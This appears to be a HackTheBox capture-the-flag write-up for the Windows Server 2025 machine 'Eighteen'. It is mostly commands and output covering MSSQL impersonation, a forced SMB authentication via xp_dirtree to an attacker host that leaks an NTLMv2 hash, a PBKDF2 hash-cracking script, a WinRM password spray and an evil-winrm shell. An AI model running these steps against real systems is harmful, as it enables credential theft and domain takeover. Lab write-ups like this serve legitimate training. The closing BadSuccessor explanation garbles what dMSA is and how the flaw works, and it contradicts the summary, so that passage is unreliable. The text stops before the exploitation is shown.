Post

Eighteen

Writeup for HackTheBox Eighteen machine

Eighteen

Executive Summary

This report details the security assessment of the HackTheBox machine “Eighteen” (Windows Server 2025 Domain Controller). The attack chain is as follows:

  • MSSQL Login Impersonation → Hash Cracking — Provided credentials kevin authenticate to MSSQL (local-auth). Impersonate appdev user to access financial_planner DB. Extract Werkzeug PBKDF2-HMAC-SHA256 admin hash and crack it to iloveyou1.
  • Password Spray → WinRM — Spray the cracked password against domain users via WinRM. User adam.scott reuses the password. Shell as adam.scott.
  • BadSuccessor (CVE-2025-53779) → DCSync → DAadam.scott is in the IT group, which has CreateChild on the Staff OU. Exploit BadSuccessor to create a dMSA pointing to Administrator. Request TGS via S4U2self, DCSync, and authenticate as Domain Administrator.

Error loading image

Machine Information

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!


Reconnaissance

An initial Nmap port scan was performed to discover active services, operating system versions, and potential entry points.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ nmap -A $IP       
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-16 07:54 UTC
Nmap scan report for 10.129.92.102
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T05:19:30
| |_Not valid after:  2055-11-16T05:19:30
| |_ssl-date: 2025-11-16T11:04:33+00:00; +3h08m55s from scanner time.
| ms-sql-info: 
|   10.129.92.102:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.129.92.102:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h08m54s, deviation: 0s, median: 3h08m54s

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   212.23 ms 10.10.14.1
2   216.60 ms 10.129.92.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.52 seconds

The scan confirms:

  • HTTP Web Server (Port 80): Microsoft IIS 10.0 hosting a redirect to eighteen.htb.
  • MSSQL Database (Port 1433): Microsoft SQL Server 2022 RTM.
  • WinRM (Port 5985): Remote management port.
  • Host Information: DC01 running Windows Server 2025 (build 26100).

To map domain resolution, the DNS settings were updated in /etc/hosts:

1
2
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ echo "10.129.92.102   dc01.eighteen.htb eighteen.htb dc01" | sudo tee -a /etc/hosts

Enumeration of Web Services (Port 80)

Browsing the IIS web service revealed a Personal Finance Management (PFM) application designed for tracking personal budgets and allocations.

Error loading image

Attempting to authenticate into the application using the given credentials (kevin) failed, indicating that the account was either not registered on the web portal or possessed a different application credential.

Error loading image


Database Enumeration & Initial Foothold

Authentication via WinRM using the user kevin failed. However, checking authentication against the MSSQL instance using the local authentication flag succeeded.

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec winrm 10.129.92.102 -u kevin -p 'iNa2we6haRj2gaw!' 
WINRM       10.129.92.102   5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.92.102   5985   DC01             [-] eighteen.htb\kevin:iNa2we6haRj2gaw!
 
┌──(kali㉿kali)-[~/HTB/Eighteen/]
└─$ netexec mssql 10.129.92.102 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
MSSQL       10.129.92.102   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.92.102   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 

RID Brute-forcing via MSSQL

A RID brute-force enumeration was initiated through the database connection to map domain users.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute
MSSQL       10.129.92.134   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.92.134   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
MSSQL       10.129.92.134   1433   DC01             498: EIGHTEEN\Enterprise Read-only Domain Controllers                                                                     
MSSQL       10.129.92.134   1433   DC01             500: EIGHTEEN\Administrator
MSSQL       10.129.92.134   1433   DC01             501: EIGHTEEN\Guest
MSSQL       10.129.92.134   1433   DC01             502: EIGHTEEN\krbtgt
MSSQL       10.129.92.134   1433   DC01             512: EIGHTEEN\Domain Admins
MSSQL       10.129.92.134   1433   DC01             513: EIGHTEEN\Domain Users
MSSQL       10.129.92.134   1433   DC01             514: EIGHTEEN\Domain Guests
MSSQL       10.129.92.134   1433   DC01             515: EIGHTEEN\Domain Computers
MSSQL       10.129.92.134   1433   DC01             516: EIGHTEEN\Domain Controllers
MSSQL       10.129.92.134   1433   DC01             517: EIGHTEEN\Cert Publishers
MSSQL       10.129.92.134   1433   DC01             518: EIGHTEEN\Schema Admins
MSSQL       10.129.92.134   1433   DC01             519: EIGHTEEN\Enterprise Admins
MSSQL       10.129.92.134   1433   DC01             520: EIGHTEEN\Group Policy Creator Owners                                                                                 
MSSQL       10.129.92.134   1433   DC01             521: EIGHTEEN\Read-only Domain Controllers                                                                                
MSSQL       10.129.92.134   1433   DC01             522: EIGHTEEN\Cloneable Domain Controllers                                                                                
MSSQL       10.129.92.134   1433   DC01             525: EIGHTEEN\Protected Users
MSSQL       10.129.92.134   1433   DC01             526: EIGHTEEN\Key Admins
MSSQL       10.129.92.134   1433   DC01             527: EIGHTEEN\Enterprise Key Admins
MSSQL       10.129.92.134   1433   DC01             528: EIGHTEEN\Forest Trust Accounts
MSSQL       10.129.92.134   1433   DC01             529: EIGHTEEN\External Trust Accounts                                                                                     
MSSQL       10.129.92.134   1433   DC01             553: EIGHTEEN\RAS and IAS Servers
MSSQL       10.129.92.134   1433   DC01             571: EIGHTEEN\Allowed RODC Password Replication Group                                                                     
MSSQL       10.129.92.134   1433   DC01             572: EIGHTEEN\Denied RODC Password Replication Group                                                                      
MSSQL       10.129.92.134   1433   DC01             1000: EIGHTEEN\DC01$
MSSQL       10.129.92.134   1433   DC01             1101: EIGHTEEN\DnsAdmins
MSSQL       10.129.92.134   1433   DC01             1102: EIGHTEEN\DnsUpdateProxy
MSSQL       10.129.92.134   1433   DC01             1601: EIGHTEEN\mssqlsvc
MSSQL       10.129.92.134   1433   DC01             1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01                                                                           
MSSQL       10.129.92.134   1433   DC01             1603: EIGHTEEN\HR
MSSQL       10.129.92.134   1433   DC01             1604: EIGHTEEN\IT
MSSQL       10.129.92.134   1433   DC01             1605: EIGHTEEN\Finance
MSSQL       10.129.92.134   1433   DC01             1606: EIGHTEEN\jamie.dunn
MSSQL       10.129.92.134   1433   DC01             1607: EIGHTEEN\jane.smith
MSSQL       10.129.92.134   1433   DC01             1608: EIGHTEEN\alice.jones
MSSQL       10.129.92.134   1433   DC01             1609: EIGHTEEN\adam.scott
MSSQL       10.129.92.134   1433   DC01             1610: EIGHTEEN\bob.brown
MSSQL       10.129.92.134   1433   DC01             1611: EIGHTEEN\carol.white
MSSQL       10.129.92.134   1433   DC01             1612: EIGHTEEN\dave.green

The domain users were parsed and saved to a file users.txt:

Interacting with Database Engine via Impacket

An interactive SQL shell was established using impacket-mssqlclient. A check on user status confirmed that the session executed within the low-privilege guest context.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/HTB/Eighteen/winrmexec]
└─$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (kevin  guest@master)> 
SQL (kevin  guest@master)> SELECT USER_NAME();
        
-----   
guest   

SQL (kevin  guest@master)>

Listing master databases revealed the database catalog:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
SQL (kevin  guest@master)> SELECT name FROM master.sys.databases;
name                
-----------------   
master              

tempdb              

model               

msdb                

financial_planner   

SQL (kevin  guest@master)> USE financial_planner;
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.

Accessing the target application database financial_planner failed due to security constraints. Evaluating roles showed that kevin was not a database administrator (sysadmin), and no remote database links were available to exploit.

1
2
3
4
5
6
7
8
9
10
SQL (kevin  guest@master)> 
SQL (kevin  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
    
-   
0   

SQL (kevin  guest@master)> EXEC sp_linkedservers;
SRV_NAME   SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE   SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
--------   ----------------   -----------   --------------   ------------------   ------------   -------   
DC01       SQLNCLI            SQL Server    DC01             NULL                 NULL           NULL      

SMB Hash Hijacking (xp_dirtree SMB leak)

To acquire the service account credentials of the database host, xp_dirtree was triggered to execute a remote file lookup against an SMB share managed by the attacker. This forces the Windows kernel running MSSQL to authenticate via NTLMv2 back to our listener.

1
2
3
4
SQL (kevin  guest@master)> EXEC master..xp_dirtree '\\10.10.14.53\SHARE';
subdirectory   depth   
------------   -----   
SQL (kevin  guest@master)>

On the attacker host, responder captured the NTLMv2 hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ sudo responder -I tun0                                                    
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

.
.
.

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.53]
    Responder IPv6             [dead:beef:2::1033]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-312NKWKSG5S]
    Responder Domain Name      [F5DI.LOCAL]
    Responder DCE-RPC Port     [48244]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder

(+) Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.92.102
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:055cd54304e99d09:047B3D3BA309D9411DE62D028576E3F1:010100000000000080AB0523D156DC0117FD5028629985E50000000002000800460035004400490001001E00570049004E002D003300310032004E004B0057004B00530047003500530004003400570049004E002D003300310032004E004B0057004B0053004700350053002E0046003500440049002E004C004F00430041004C000300140046003500440049002E004C004F00430041004C000500140046003500440049002E004C004F00430041004C000700080080AB0523D156DC01060004000200000008003000300000000000000000000000003000008214642BE6C87E0889CE9BAD6FBA3EDAF2DABB2CEA86FB0196E9750C299421940A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350033000000000000000000

Cracking the NTLMv2 hash via John the Ripper using the rockyou.txt wordlist yielded no match.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:14 DONE (2025-11-16 08:17) 0g/s 971141p/s 971141c/s 971141C/s !)(OPPQR..*7¡Vamos!
Session completed. 

Exploiting Login Impersonation (appdev)

An enumeration of SQL logins was performed using netexec to check for administrative user objects or potential impersonation pathways.

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_logins
MSSQL       10.129.92.134   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.92.134   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
ENUM_LOGINS 10.129.92.134   1433   DC01             [+] Logins found:
ENUM_LOGINS 10.129.92.134   1433   DC01             [*]   - sa
ENUM_LOGINS 10.129.92.134   1433   DC01             [*]   - kevin
ENUM_LOGINS 10.129.92.134   1433   DC01             [*]   - appdev

Checking SQL impersonation rights (IMPERSONATE permissions) revealed that kevin could impersonate the appdev user.

1
2
3
4
5
6
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec mssql 10.129.92.134 -u kevin -p 'iNa2we6haRj2gaw!' --local-auth -M enum_impersonate
MSSQL       10.129.92.134   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.92.134   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
ENUM_IMP... 10.129.92.134   1433   DC01             [+] Users with impersonation rights:
ENUM_IMP... 10.129.92.134   1433   DC01             [*]   - appdev

Switching the execution context to appdev allowed access to the master databases:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
SQL (kevin  guest@master)> EXECUTE AS LOGIN = 'appdev';
SQL (appdev  appdev@master)> 
SQL (appdev  appdev@master)> SELECT name FROM master.sys.databases;
name                
-----------------   
master              

tempdb              

model               

msdb                

financial_planner   

SQL (appdev  appdev@master)> USE financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)> 

The financial_planner catalog schemas and tables were dumped. The users table contained administrative credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
SQL (appdev  appdev@financial_planner)> SELECT * FROM information_schema.tables;
TABLE_CATALOG       TABLE_SCHEMA   TABLE_NAME    TABLE_TYPE   
-----------------   ------------   -----------   ----------   
financial_planner   dbo            users         b'BASE TABLE'   

financial_planner   dbo            incomes       b'BASE TABLE'   

financial_planner   dbo            expenses      b'BASE TABLE'   

financial_planner   dbo            allocations   b'BASE TABLE'   

financial_planner   dbo            analytics     b'BASE TABLE'   

financial_planner   dbo            visits        b'BASE TABLE'   

SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.incomes;
id   user_id   monthly_salary   yearly_salary   created_at   
--   -------   --------------   -------------   ----------   
SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------   
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03   

SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.incomes;
id   user_id   monthly_salary   yearly_salary   created_at   
--   -------   --------------   -------------   ----------   
SQL (appdev  appdev@financial_planner)> 
SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.expenses;
id   user_id   category   type   value   created_at   
--   -------   --------   ----   -----   ----------   
SQL (appdev  appdev@financial_planner)> 
SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.allocations;
id   user_id   savings   investments   created_at   
--   -------   -------   -----------   ----------   
SQL (appdev  appdev@financial_planner)> 
SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.analytics;id   metric_name   metric_value   last_updated   
--   -----------   ------------   ------------   
SQL (appdev  appdev@financial_planner)> 
SQL (appdev  appdev@financial_planner)> SELECT * FROM financial_planner.dbo.visits;
  id   user_agent                                                               visited_page    timestamp   
----   ----------------------------------------------------------------------   ------------   ----------   
   1   Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0   /              2025-10-27 16:53:21   

   2   Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0   /              2025-10-27 16:53:23   

   3   Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0   /              2025-10-27 16:53:24   

....
....

Flask Werkzeug Hash Cracking

The recovered admin hash signature uses the format:

1
pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133

This represents:

  • Algorithm: PBKDF2-HMAC-SHA256
  • Iterations: 600,000
  • Salt: AMtzteQIG7yAbZIa
  • Hash Digest: 0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133

Due to the extremely high iteration count (600,000) and custom formatting structure, native GPU cracking programs are inefficient. Instead, a custom Python cracker script was written using Python’s standard hashlib.pbkdf2_hmac library.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import hashlib
import binascii

# From database
hash_from_db = "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"
salt = "AMtzteQIG7yAbZIa"
iterations = 600000

# Example wordlist
with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.strip()
        dk = hashlib.pbkdf2_hmac(
            'sha256',
            password.encode(),
            salt.encode(),
            iterations
        )
        if binascii.hexlify(dk).decode() == hash_from_db:
            print(f"[+] Found password: {password}")
            break

Running the cracker successfully recovered the plain-text password:

1
2
3
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ python3 hash_crack.py                                                                           
[+] Found password: iloveyou1

Remote WinRM Access

Although the web portal rejected login attempts with admin:iloveyou1 (due to registration restrictions or database mismatch), a domain-wide password spray against WinRM was executed using the recovered password iloveyou1.

Error loading image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ netexec winrm 10.129.92.134 -u users.txt -p 'iloveyou1'         
WINRM       10.129.92.134   5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.92.134   5985   DC01             [-] eighteen.htb\jamie.dunn:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.92.134   5985   DC01             [-] eighteen.htb\jane.smith:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.92.134   5985   DC01             [-] eighteen.htb\alice.jones:iloveyou1
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.92.134   5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)

The user adam.scott was compromised. A shell was spawned over evil-winrm:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ evil-winrm -i eighteen.htb -u adam.scott -p iloveyou1               
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                              
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                         
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> ls


    Directory: C:\Users\adam.scott\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/16/2025  11:04 AM             34 user.txt


*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cat user.txt
************1131dd3144f0e680e23a

User privileges were mapped using the whoami /priv command:

1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Active Directory Enumeration (SharpHound)

Due to firewall restrictions blocking incoming LDAP (389) and Global Catalog (3268) queries externally, the standard bloodhound-python ingestor could not be used. Instead, SharpHound.exe was uploaded and executed locally on the Windows target host inside a temporary directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> mkdir \Temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/16/2025   2:35 PM                Temp


*Evil-WinRM* PS C:\Users\adam.scott\Desktop> cd \Temp
*Evil-WinRM* PS C:\Temp> upload SharpHound.exe
                                        
Info: Uploading /home/kali/HTB/Eighteen/SharpHound.exe to C:\Temp\SharpHound.exe
                                        
Data: 1753768 bytes of 1753768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> .\SharpHound.exe -c all
2025-11-16T14:37:31.0061178-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-11-16T14:37:31.2003757-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-11-16T14:37:31.2386873-08:00|INFORMATION|Initializing SharpHound at 2:37 PM on 11/16/2025
2025-11-16T14:37:31.3475352-08:00|INFORMATION|Resolved current domain to eighteen.htb
2025-11-16T14:37:42.6465301-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices, LdapServices, WebClientService, SmbInfo, NTLMRegistry
2025-11-16T14:37:42.7751106-08:00|INFORMATION|Beginning LDAP search for eighteen.htb
2025-11-16T14:37:42.7771193-08:00|INFORMATION|Collecting AdminSDHolder data for eighteen.htb
2025-11-16T14:37:42.8405279-08:00|INFORMATION|AdminSDHolder ACL hash 0CF24F884FD0E60DA72B191DC1D3CD6A28B81B51 calculated for eighteen.htb.
.
.
.
2025-11-16T14:37:44.4723093-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for EIGHTEEN.HTB
2025-11-16T14:37:44.5376101-08:00|INFORMATION|Beginning LDAP search for eighteen.htb Configuration NC
2025-11-16T14:37:46.0064828-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-11-16T14:37:46.0105018-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-11-16T14:37:51.5828642-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-11-16T14:37:51.6213793-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-11-16T14:37:51.7545385-08:00|INFORMATION|Status: 318 objects finished (+318 39.75)/s -- Using 78 MB RAM
2025-11-16T14:37:51.7545385-08:00|INFORMATION|Enumeration finished in 00:00:08.9986748
2025-11-16T14:37:51.8620949-08:00|INFORMATION|Saving cache with stats: 17 ID to type mappings.
 0 name to SID mappings.
 1 machine sid mappings.
 3 sid to domain mappings.
 0 global catalog mappings.
 2025-11-16T14:37:51.9122969-08:00|INFORMATION|SharpHound Enumeration Completed at 2:37 PM on 11/16/2025! Happy Graphing!
*Evil-WinRM* PS C:\Temp> ls


    Directory: C:\Temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2025   2:37 PM          29264 20251116143745_BloodHound.zip
-a----        11/16/2025   2:37 PM           1382 MGE1ZTIxYmUtZjVmMS00YzI1LWFjMzktZDdlNDBkZGFhYmQw.bin
-a----        11/16/2025   2:36 PM        1315328 SharpHound.exe


*Evil-WinRM* PS C:\Temp> download 20251116143745_BloodHound.zip
                                        
Info: Downloading C:\Temp\20251116143745_BloodHound.zip to 20251116143745_BloodHound.zip
                                        
Info: Download successful!

The downloaded BloodHound archive was loaded into the BloodHound console to trace incoming and outbound permissions.

  • Reviewing the user account ADAM.SCOTT@EIGHTEEN.HTB, there are no immediate outbound objects under direct control.
  • Check on groups: adam.scott is a member of the IT group.

Error loading image

  • Identifying sessions: adam.scott holds an active session on the domain controller computer object DC01.EIGHTEEN.HTB.

Error loading image

  • Direct PSRemote privileges to the target computer object exist but don’t provide administrative paths.

Error loading image


Domain Privilege Escalation: BadSuccessor (CVE-2025-53779)

Verifying Server Platform

The target host execution context was verified using Get-ADDomainController to confirm the operating system.

1
2
3
4
5
*Evil-WinRM* PS C:\Temp> Get-ADDomainController -Filter * | Select-Object HostName, OperatingSystem, OperatingSystemVersion

HostName          OperatingSystem                OperatingSystemVersion
--------          ---------------                ----------------------
DC01.eighteen.htb Windows Server 2025 Datacenter 10.0 (26100)

The domain controller runs Windows Server 2025, which is vulnerable to the BadSuccessor privilege escalation exploit.

BadSuccessor Attack Vector Explained

BadSuccessor (CVE-2025-53779) is a logical privilege escalation vulnerability residing within the Active Directory architecture of Windows Server 2025.

  • The Mechanism: Windows Server 2025 introduced Directory Managed Machine Secret Attributes (DMSA) for machine secret updates.
  • When a computer rotates secrets or properties, AD creates a “successor” computer metadata object linked to a predecessor.
  • During object creation, Windows copies the security descriptors and configuration permissions from the predecessor.
  • The Vulnerability: High-privilege access rights and security flags that should never propagate are inherited by the new successor object.
